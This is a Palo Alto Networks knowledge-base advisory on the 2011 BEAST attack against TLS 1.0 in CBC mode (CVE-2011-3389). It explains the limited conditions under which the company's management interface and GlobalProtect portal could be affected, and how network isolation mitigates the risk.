CVE-2011-3389: The BEAST Attack to TLS 1.0

CVE-2011-3389: The BEAST Attack to TLS 1.0

36807
Created On 09/26/18 13:44 PM - Last Modified 06/06/23 19:47 PM


Resolution


Details

In 2011, an attack (the "BEAST" attack) was demonstrated against the SSL 3.0 and TLS 1.0 protocol in CBC mode (CVE-2011-3389). All SSL/TLS connections initiated or terminated by Palo Alto Networks products support use of TLS 1.0 with CBC mode. However, the impact of the BEAST is limited in scope.

 

Palo Alto Networks Device Management Interfaces:

In order for the BEAST attack to be successful, the following must be true:

  1. The attacker must have access to the management interface of the device. Network security best practices usually calls for the management interface to only be exposed on a dedicated management network, isolated from production network traffic.
  2. The victim administrator must be using a browser that has not been updated to disable use of CBC mode for SSL 3.0 and TLS 1.0 connections.
  3. An attacker must be able to control and generate specifically crafted requests from the victim's browser to an HTTPS site before the user also visits the Palo Alto Networks device web-based management interface within the same browser session over HTTPS, without closing the browser. The first step is used to prepare knowledge of the Initialization Vector (IV), that is used to exploit the SSL session to the site visited in the second step.
    Note: Item 3, is very difficult to perform in a real world scenario, and the issue can be completely mitigated if (1) above is not true, meaning the management network and production network are isolated.

 

GlobalProtect Portals and Gateways:

Connections from the GlobalProtect client to the portal and gateway for SSL VPN tunnels are not vulnerable to the BEAST attack, because the GlobalProtect client cannot be manipulated to discover the IV like a web browser.

 

When the GlobalProtect portal is accessed through a web browser, the BEAST attack applies under the same conditions and described above for the device management GUI, however its only function is to download the GlobalProtect client. No VPN connection is made at this time, and the scope is significantly limited.

 

owner: gwesson
Other users also viewed:
Actions
  • Print
  • Copy Link

    https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClmDCAS&refURL=http%3A%2F%2Fknowledgebase.paloaltonetworks.com%2FKCSArticleDetail

Choose Language